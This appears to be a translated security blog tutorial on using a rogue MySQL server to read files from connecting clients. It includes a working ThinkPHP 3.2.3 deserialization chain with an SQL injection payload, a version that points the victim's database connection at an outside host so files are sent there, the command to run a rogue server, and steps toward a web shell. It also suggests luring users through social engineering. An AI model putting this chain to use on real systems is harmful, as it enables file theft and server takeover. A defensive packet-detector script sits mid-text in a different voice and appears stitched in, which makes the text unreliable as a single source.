“Network Security” How to build a malicious MySQL server to read files?

Foreword

Note: This article does not dissect the MySQL protocol messages themselves. It only explains the principle and gives a few demonstrations.

Although the barrier to using a malicious MySQL server to read files directly is fairly high, I found it interesting because I recently saw a relatively new way of using it online (using social engineering to lure users into connecting to the MySQL server and then reading their files). I summarised the attack principle and the attack methods, so I wrote this article.

Principle

Before elaborating on the specific principle, let me introduce a few SQL statements to help with what follows.

First create a new tmp.txt in the /tmp directory.

The content is as follows:

Then execute the following SQL statement to import tmp.txt into the table:

mysql> load data local infile "/tmp/tmp.txt" into table test fields terminated by '\\
';
Query OK, 3 rows affected (2.63 sec)
Records: 3 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select * from Test;
+-------+
| name  |
+-------+
| admin |
| user  |
| Lxxx  |
+-------+
3 rows in set (0.00 sec)

  • The load data local infile statement reads a file from the client's machine
  • The load data infile statement reads a file from the server's machine
  • terminated by specifies the character the fields are split on; the default is Tab, here I set it to \\

At this point it may still be unclear which machine is the server and which is the client.

Under normal circumstances SQL is debugged on the local machine and the database is also on the local machine, so both the client and the server are local and the two are hard to tell apart. I will briefly describe it with a picture below.

Locally, since the client and server share the same disk, the file can be loaded into the database whether or not local is added. The vulnerability discussed later, using a malicious MySQL server to read files, requires local, because it is the local form that makes the client send the file out.


I drew two pictures below. The first is the normal business flow, and the second is the attack flow when an attacker is involved.

The normal back-end business flow is as follows:

When an attacker hijacks the back-end server's database connection and sets up a malicious MySQL server on the public network, the flow is as follows:

In this way, the attacker can download arbitrary files that the back-end's database client can read.

Demo

Although a similar challenge appeared in a previous CTF competition, here I still use the deserialization vulnerability in ThinkPHP 3.2.3, combined with a malicious MySQL server, to read sensitive files and then move on to RCE.

First, start a ThinkPHP 3.2.3 application locally, connect it to the database, and write a deserialization entry point in the Application/Home/Controller/HelloController.class.php controller.

<?php
namespace Home\Controller;

use Think\Controller;

class HelloController extends Controller
{
    // Deserialization entry: $Lxxx is bound from the request parameter of the same name
    public function index($Lxxx){
        echo base64_decode($Lxxx);
        $a = unserialize(base64_decode($Lxxx));
    }
}

I will not walk through the chain itself; there are many write-ups online. Even so, I still need to explain what this chain can achieve.

  1. First of all, a deserialization entry point is needed. This is obvious: without one, no deserialization can happen, which is why I wrote the entry point in the HelloController controller above;
  2. The end of this chain requires database-related information, such as the database name, port, user and password, and the chain allows stacked injection. So if you know the database details, you can use stacked injection to write a one-sentence web shell and get a shell.

Here I will give the chain directly, and then demonstrate how to build a malicious MySQL server, obtain sensitive files, and then get a shell.

<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // Enable to read files
        );
        // Database connection details used by the driver
        protected $config = array(
            "debug"    => 1,
            "database" => "tp323",
            "hostname" => "127.0.0.1",
            "hostport" => "8889",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                // table name carrying the error-based injection payload
                "table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

The database information in the above chain is that of my local database. Running the file produces the following serialized string:


Pass it in the URL:

You can see that the error-based injection succeeded.

Then build a malicious MySQL service on the public Internet. A script for this has already been written by others on GitHub. The underlying principle is that in the MySQL client/server protocol it is the server that decides whether the response to a query is a result set or a request for the client to send a local file; a client with local infile enabled will read and send whatever file name such a response asks for, regardless of the query it issued. The script speaks enough of the protocol to accept a connection from the back-end server, send that request, and collect the file.

After downloading the PoC, change the name of the file to be read.

Then start it with Python. Once started, the malicious MySQL server listens on port 3307.

python rogue_mysql_server.py
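To make the mechanism concrete from the defender's side, here is an added example (my own code, not the GitHub script and not from the original post) that walks a captured server-to-client MySQL byte stream and flags the LOCAL INFILE request packet a rogue server sends in place of a result set. The sample bytes are constructed, and the packet-format details are assumed from the MySQL client/server protocol rather than taken from this post.

```python
# Assumed protocol facts (MySQL client/server protocol, not from the post):
# each packet is a 3-byte little-endian payload length + 1-byte sequence id +
# payload; a LOCAL INFILE request payload starts with 0xFB followed by the
# file name the client is expected to read from its own disk and send back.

def iter_packets(stream: bytes):
    """Yield (sequence_id, payload) for each complete packet in the stream."""
    off = 0
    while off + 4 <= len(stream):
        length = int.from_bytes(stream[off:off + 3], "little")
        payload = stream[off + 4:off + 4 + length]
        if len(payload) < length:
            break  # truncated capture: stop rather than mis-parse
        yield stream[off + 3], payload
        off += 4 + length

def classify(payload: bytes) -> str:
    """Name a server response by its first byte, the way a client does."""
    first = payload[0] if payload else -1
    if first == 0x00:
        return "OK"
    if first == 0xFF:
        return "ERR"
    if first == 0xFE and len(payload) < 9:
        return "EOF"
    if first == 0xFB:
        return "LOCAL_INFILE_REQUEST"  # server wants the client to upload a file
    return "RESULTSET"  # column-count packet of an ordinary result set

def find_local_infile_requests(stream: bytes) -> list:
    """Return the file names the server asked the client to upload, in order."""
    found = []
    for _seq, payload in iter_packets(stream):
        if classify(payload) == "LOCAL_INFILE_REQUEST":
            found.append(payload[1:].decode("utf-8", "replace"))
    return found

def packet(seq: int, payload: bytes) -> bytes:
    """Frame one payload with the 4-byte MySQL packet header (sample data only)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

# Constructed sample stream: a normal OK packet, then the answer a rogue server
# gives to the application's ordinary SELECT, then an ERR packet (code 1045).
SAMPLE_STREAM = (
    packet(1, b"\x00\x00\x00\x02\x00\x00\x00")        # OK: 0 rows, autocommit flag
    + packet(1, b"\xfb/tmp/tmp.txt")                  # LOCAL INFILE request
    + packet(2, b"\xff\x15\x04#28000Access denied")   # ERR packet
)

if __name__ == "__main__":
    print("files requested from client:", find_local_infile_requests(SAMPLE_STREAM))
```

Run over a real capture of the back-end's database traffic, any non-empty result is a sign the server end is asking for client files; the fix on the client side is to leave local infile disabled (PDO::MYSQL_ATTR_LOCAL_INFILE false).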

Next, modify the previous chain so that the IP and port point to the remote malicious MySQL server, then regenerate the payload.

<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true // Enable to read files
        );
        // Now points at the malicious MySQL server instead of the local database
        protected $config = array(
            "debug"    => 1,
            "database" => "tp323",
            "hostname" => "1.1.1.1",
            "hostport" => "3307",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

which gives:


Pass it to the HelloController controller.

The file that was pulled from the back end can then be found in mysql.log on the remote VPS.

Now that the database details have been obtained, the chain can be constructed again and stacked injection used to write the one-sentence web shell and get a shell.

Usage scenarios

  • When you can hijack the back-end server's database connection but cannot get a shell, this method can be used to get one (for example, the ThinkPHP 3.2.3 chain only reaches the database layer, so this method can be used to get a shell from there);
  • Luring users into connecting to a malicious MySQL server (social engineering).
